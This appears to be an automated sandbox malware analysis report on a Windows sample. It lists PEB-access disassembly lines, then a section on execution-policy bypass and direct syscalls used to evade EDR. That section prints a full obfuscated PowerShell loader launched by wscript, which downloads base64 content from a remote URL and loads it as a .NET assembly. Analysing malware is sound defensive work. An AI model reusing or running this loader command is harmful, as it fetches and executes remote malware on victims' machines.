Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF7BA mov eax, dword ptr fs:[00000030h]	10_2_038FF7BA
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF7BA mov eax, dword ptr fs:[00000030h]	10_2_038FF7BA
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF7BA mov eax, dword ptr fs:[00000030h]	10_2_038FF7BA
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF7BA mov eax, dword ptr fs:[00000030h]	10_2_038FF7BA
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF7BA mov eax, dword ptr fs:[00000030h]	10_2_038FF7BA
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF7BA mov eax, dword ptr fs:[00000030h]	10_2_038FF7BA
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF7BA mov eax, dword ptr fs:[00000030h]	10_2_038FF7BA
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398F7AF mov eax, dword ptr fs:[00000030h]	10_2_0398F7AF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398F7AF mov eax, dword ptr fs:[00000030h]	10_2_0398F7AF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398F7AF mov eax, dword ptr fs:[00000030h]	10_2_0398F7AF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398F7AF mov eax, dword ptr fs:[00000030h]	10_2_0398F7AF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398F7AF mov eax, dword ptr fs:[00000030h]	10_2_0398F7AF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039007AF mov eax, dword ptr fs:[00000030h]	10_2_039007AF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390C7C0 mov eax, dword ptr fs:[00000030h]	10_2_0390C7C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039057C0 mov eax, dword ptr fs:[00000030h]	10_2_039057C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039057C0 mov eax, dword ptr fs:[00000030h]	10_2_039057C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039057C0 mov eax, dword ptr fs:[00000030h]	10_2_039057C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039807C3 mov eax, dword ptr fs:[00000030h]	10_2_039807C3
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039047FB mov eax, dword ptr fs:[00000030h]	10_2_039047FB
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039047FB mov eax, dword ptr fs:[00000030h]	10_2_039047FB
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390D7E0 mov ecx, dword ptr fs:[00000030h]	10_2_0390D7E0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398E7E1 mov eax, dword ptr fs:[00000030h]	10_2_0398E7E1
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039227ED mov eax, dword ptr fs:[00000030h]	10_2_039227ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039227ED mov eax, dword ptr fs:[00000030h]	10_2_039227ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039227ED mov eax, dword ptr fs:[00000030h]	10_2_039227ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03900710 mov eax, dword ptr fs:[00000030h]	10_2_03900710
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03930710 mov eax, dword ptr fs:[00000030h]	10_2_03930710
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393F71F mov eax, dword ptr fs:[00000030h]	10_2_0393F71F
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393F71F mov eax, dword ptr fs:[00000030h]	10_2_0393F71F
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03905702 mov eax, dword ptr fs:[00000030h]	10_2_03905702
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03905702 mov eax, dword ptr fs:[00000030h]	10_2_03905702
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03907703 mov eax, dword ptr fs:[00000030h]	10_2_03907703
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393C700 mov eax, dword ptr fs:[00000030h]	10_2_0393C700
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039DB73C mov eax, dword ptr fs:[00000030h]	10_2_039DB73C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039DB73C mov eax, dword ptr fs:[00000030h]	10_2_039DB73C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039DB73C mov eax, dword ptr fs:[00000030h]	10_2_039DB73C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039DB73C mov eax, dword ptr fs:[00000030h]	10_2_039DB73C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0397C730 mov eax, dword ptr fs:[00000030h]	10_2_0397C730
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03935734 mov eax, dword ptr fs:[00000030h]	10_2_03935734
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390973A mov eax, dword ptr fs:[00000030h]	10_2_0390973A
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390973A mov eax, dword ptr fs:[00000030h]	10_2_0390973A
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393273C mov eax, dword ptr fs:[00000030h]	10_2_0393273C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393273C mov ecx, dword ptr fs:[00000030h]	10_2_0393273C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393273C mov eax, dword ptr fs:[00000030h]	10_2_0393273C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03903720 mov eax, dword ptr fs:[00000030h]	10_2_03903720
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391F720 mov eax, dword ptr fs:[00000030h]	10_2_0391F720
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391F720 mov eax, dword ptr fs:[00000030h]	10_2_0391F720
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391F720 mov eax, dword ptr fs:[00000030h]	10_2_0391F720
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393C720 mov eax, dword ptr fs:[00000030h]	10_2_0393C720
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393C720 mov eax, dword ptr fs:[00000030h]	10_2_0393C720
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039BF72E mov eax, dword ptr fs:[00000030h]	10_2_039BF72E
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C972B mov eax, dword ptr fs:[00000030h]	10_2_039C972B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F9730 mov eax, dword ptr fs:[00000030h]	10_2_038F9730
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F9730 mov eax, dword ptr fs:[00000030h]	10_2_038F9730
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03900750 mov eax, dword ptr fs:[00000030h]	10_2_03900750
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942750 mov eax, dword ptr fs:[00000030h]	10_2_03942750
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942750 mov eax, dword ptr fs:[00000030h]	10_2_03942750
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398E75D mov eax, dword ptr fs:[00000030h]	10_2_0398E75D
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03984755 mov eax, dword ptr fs:[00000030h]	10_2_03984755
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03913740 mov eax, dword ptr fs:[00000030h]	10_2_03913740
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03913740 mov eax, dword ptr fs:[00000030h]	10_2_03913740
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03913740 mov eax, dword ptr fs:[00000030h]	10_2_03913740
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039D3749 mov eax, dword ptr fs:[00000030h]	10_2_039D3749
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393674D mov esi, dword ptr fs:[00000030h]	10_2_0393674D
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393674D mov eax, dword ptr fs:[00000030h]	10_2_0393674D
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393674D mov eax, dword ptr fs:[00000030h]	10_2_0393674D
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03908770 mov eax, dword ptr fs:[00000030h]	10_2_03908770
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03910770 mov eax, dword ptr fs:[00000030h]	10_2_03910770
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03910770 mov eax, dword ptr fs:[00000030h]	10_2_03910770
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03910770 mov eax, dword ptr fs:[00000030h]	10_2_03910770
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03910770 mov eax, dword ptr fs:[00000030h]	10_2_03910770
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03910770 mov eax, dword ptr fs:[00000030h]	10_2_03910770
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03910770 mov eax, dword ptr fs:[00000030h]	10_2_03910770
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03910770 mov eax, dword ptr fs:[00000030h]	10_2_03910770
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03910770 mov eax, dword ptr fs:[00000030h]	10_2_03910770
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03910770 mov eax, dword ptr fs:[00000030h]	10_2_03910770
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03910770 mov eax, dword ptr fs:[00000030h]	10_2_03910770
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03910770 mov eax, dword ptr fs:[00000030h]	10_2_03910770
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03910770 mov eax, dword ptr fs:[00000030h]	10_2_03910770
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FB765 mov eax, dword ptr fs:[00000030h]	10_2_038FB765
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FB765 mov eax, dword ptr fs:[00000030h]	10_2_038FB765
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FB765 mov eax, dword ptr fs:[00000030h]	10_2_038FB765
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FB765 mov eax, dword ptr fs:[00000030h]	10_2_038FB765
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03904690 mov eax, dword ptr fs:[00000030h]	10_2_03904690
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03904690 mov eax, dword ptr fs:[00000030h]	10_2_03904690
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398368C mov eax, dword ptr fs:[00000030h]	10_2_0398368C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398368C mov eax, dword ptr fs:[00000030h]	10_2_0398368C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398368C mov eax, dword ptr fs:[00000030h]	10_2_0398368C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398368C mov eax, dword ptr fs:[00000030h]	10_2_0398368C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039366B0 mov eax, dword ptr fs:[00000030h]	10_2_039366B0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FD6AA mov eax, dword ptr fs:[00000030h]	10_2_038FD6AA
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FD6AA mov eax, dword ptr fs:[00000030h]	10_2_038FD6AA
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393C6A6 mov eax, dword ptr fs:[00000030h]	10_2_0393C6A6
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F76B2 mov eax, dword ptr fs:[00000030h]	10_2_038F76B2
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F76B2 mov eax, dword ptr fs:[00000030h]	10_2_038F76B2
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F76B2 mov eax, dword ptr fs:[00000030h]	10_2_038F76B2
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390B6C0 mov eax, dword ptr fs:[00000030h]	10_2_0390B6C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390B6C0 mov eax, dword ptr fs:[00000030h]	10_2_0390B6C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390B6C0 mov eax, dword ptr fs:[00000030h]	10_2_0390B6C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390B6C0 mov eax, dword ptr fs:[00000030h]	10_2_0390B6C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390B6C0 mov eax, dword ptr fs:[00000030h]	10_2_0390B6C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390B6C0 mov eax, dword ptr fs:[00000030h]	10_2_0390B6C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C16CC mov eax, dword ptr fs:[00000030h]	10_2_039C16CC
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C16CC mov eax, dword ptr fs:[00000030h]	10_2_039C16CC
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C16CC mov eax, dword ptr fs:[00000030h]	10_2_039C16CC
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C16CC mov eax, dword ptr fs:[00000030h]	10_2_039C16CC
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393A6C7 mov ebx, dword ptr fs:[00000030h]	10_2_0393A6C7
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393A6C7 mov eax, dword ptr fs:[00000030h]	10_2_0393A6C7
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039BF6C7 mov eax, dword ptr fs:[00000030h]	10_2_039BF6C7
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039316CF mov eax, dword ptr fs:[00000030h]	10_2_039316CF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0397E6F2 mov eax, dword ptr fs:[00000030h]	10_2_0397E6F2
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0397E6F2 mov eax, dword ptr fs:[00000030h]	10_2_0397E6F2
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0397E6F2 mov eax, dword ptr fs:[00000030h]	10_2_0397E6F2
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0397E6F2 mov eax, dword ptr fs:[00000030h]	10_2_0397E6F2
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039806F1 mov eax, dword ptr fs:[00000030h]	10_2_039806F1
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039806F1 mov eax, dword ptr fs:[00000030h]	10_2_039806F1
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039BD6F0 mov eax, dword ptr fs:[00000030h]	10_2_039BD6F0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392D6E0 mov eax, dword ptr fs:[00000030h]	10_2_0392D6E0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392D6E0 mov eax, dword ptr fs:[00000030h]	10_2_0392D6E0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039936EE mov eax, dword ptr fs:[00000030h]	10_2_039936EE
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039936EE mov eax, dword ptr fs:[00000030h]	10_2_039936EE
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039936EE mov eax, dword ptr fs:[00000030h]	10_2_039936EE
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039936EE mov eax, dword ptr fs:[00000030h]	10_2_039936EE
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039936EE mov eax, dword ptr fs:[00000030h]	10_2_039936EE
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039936EE mov eax, dword ptr fs:[00000030h]	10_2_039936EE
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039336EF mov eax, dword ptr fs:[00000030h]	10_2_039336EF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03903616 mov eax, dword ptr fs:[00000030h]	10_2_03903616
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03903616 mov eax, dword ptr fs:[00000030h]	10_2_03903616
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942619 mov eax, dword ptr fs:[00000030h]	10_2_03942619
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393F603 mov eax, dword ptr fs:[00000030h]	10_2_0393F603
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03931607 mov eax, dword ptr fs:[00000030h]	10_2_03931607
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391260B mov eax, dword ptr fs:[00000030h]	10_2_0391260B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391260B mov eax, dword ptr fs:[00000030h]	10_2_0391260B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391260B mov eax, dword ptr fs:[00000030h]	10_2_0391260B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391260B mov eax, dword ptr fs:[00000030h]	10_2_0391260B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391260B mov eax, dword ptr fs:[00000030h]	10_2_0391260B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391260B mov eax, dword ptr fs:[00000030h]	10_2_0391260B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391260B mov eax, dword ptr fs:[00000030h]	10_2_0391260B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0397E609 mov eax, dword ptr fs:[00000030h]	10_2_0397E609
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF626 mov eax, dword ptr fs:[00000030h]	10_2_038FF626
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF626 mov eax, dword ptr fs:[00000030h]	10_2_038FF626

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICgoKCdoJysnUmZ1JysncmwgPSBoM2todHRwczonKycvLycrJ3JhJysndy4nKydnaXRodScrJ2J1Jysnc2VyJysnY29udGVuJysndC5jb20nKycvTm8nKydEZXRlY3RPJysnbi9Ob0RldGVjdE9uL3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtJysnVi50eHRoM2s7IGhSJysnZmInKydhc2U2NCcrJ0NvbnRlbnQgPScrJyAoTmUnKyd3LU9iamVjdCBTeXN0ZScrJ20uTicrJ2V0LldlYicrJ0NsaWVudCkuRG93bmxvYWRTdHInKydpbmcnKycoaFInKydmdXJsKTsgaFInKydmYmluYXInKyd5QycrJ29udGVudCA9IFtTJysneScrJ3N0ZW0uQ29udmVyJysndF06JysnOkZyb21CYScrJ3MnKydlNjRTdHInKydpbmcoaCcrJ1JmYicrJ2EnKydzJysnZTY0Q28nKydudGVudCcrJyknKyc7IGgnKydSZmEnKydzcycrJ2VtYmx5ID0gW1JlZmxlJysnY3Rpb24nKycuQXNzZW1ibHknKyddOjpMb2FkKGhSZmJpbmFyeUNvbnRlbnQpOyBbZCcrJ25saWInKycuSU8uSG9tZV06OlZBSSgnKydDdXQwL08nKycxRktTL2QvZWUuZXRzYXAnKycvLzpzcHR0aCcrJ0N1dCwgQ3UnKyd0ZCcrJ2VzYXRpdmFkb0N1dCwnKycgJysnQ3UnKyd0ZGVzYXRpdmFkb0N1dCwgJysnQ3V0ZGUnKydzYXRpdmFkb0N1dCwgQ3V0ZCcrJ2VzJysnYXQnKydpdmEnKydkbycrJ0N1dCwnKycgQycrJ3V0MUMnKyd1dCwgQ3V0YXBwaWR0ZWxDdXQpJykgIC1jUkVwbEFjRSdDdXQnLFtjSEFSXTM0ICAtUkVwTEFDZSAgKFtjSEFSXTEwNCtbY0hBUl04MitbY0hBUl0xMDIpLFtjSEFSXTM2ICAtUkVwTEFDZShbY0hBUl0xMDQrW2NIQVJdNTErW2NIQVJdMTA3KSxbY0hBUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtResumeThread: Direct from: 0x773836AC	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtMapViewOfSection: Direct from: 0x77382D1C	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtWriteVirtualMemory: Direct from: 0x77382E3C	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtProtectVirtualMemory: Direct from: 0x77382F9C	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtSetInformationThread: Direct from: 0x773763F9	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtCreateMutant: Direct from: 0x773835CC	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtNotifyChangeKey: Direct from: 0x77383C2C	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtSetInformationProcess: Direct from: 0x77382C5C	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtCreateUserProcess: Direct from: 0x7738371C	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtQueryInformationProcess: Direct from: 0x77382C26	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtResumeThread: Direct from: 0x77382FBC	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtWriteVirtualMemory: Direct from: 0x7738490C	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtAllocateVirtualMemory: Direct from: 0x77383C9C	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtReadFile: Direct from: 0x77382ADC	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtAllocateVirtualMemory: Direct from: 0x77382BFC	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtDelayExecution: Direct from: 0x77382DDC	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtQuerySystemInformation: Direct from: 0x77382DFC	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtOpenSection: Direct from: 0x77382E0C	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtQueryVolumeInformationFile: Direct from: 0x77382F2C	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtQuerySystemInformation: Direct from: 0x773848CC	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtReadVirtualMemory: Direct from: 0x77382E8C	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtCreateKey: Direct from: 0x77382C6C	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtAllocateVirtualMemory: Direct from: 0x773848EC	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtQueryAttributesFile: Direct from: 0x77382E6C	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtSetInformationThread: Direct from: 0x77382B4C	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtTerminateThread: Direct from: 0x77382FCC	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtQueryInformationToken: Direct from: 0x77382CAC	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtOpenKeyEx: Direct from: 0x77382B9C	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtAllocateVirtualMemory: Direct from: 0x77382BEC	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtDeviceIoControlFile: Direct from: 0x77382AEC	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtCreateFile: Direct from: 0x77382FEC	Jump to behavior
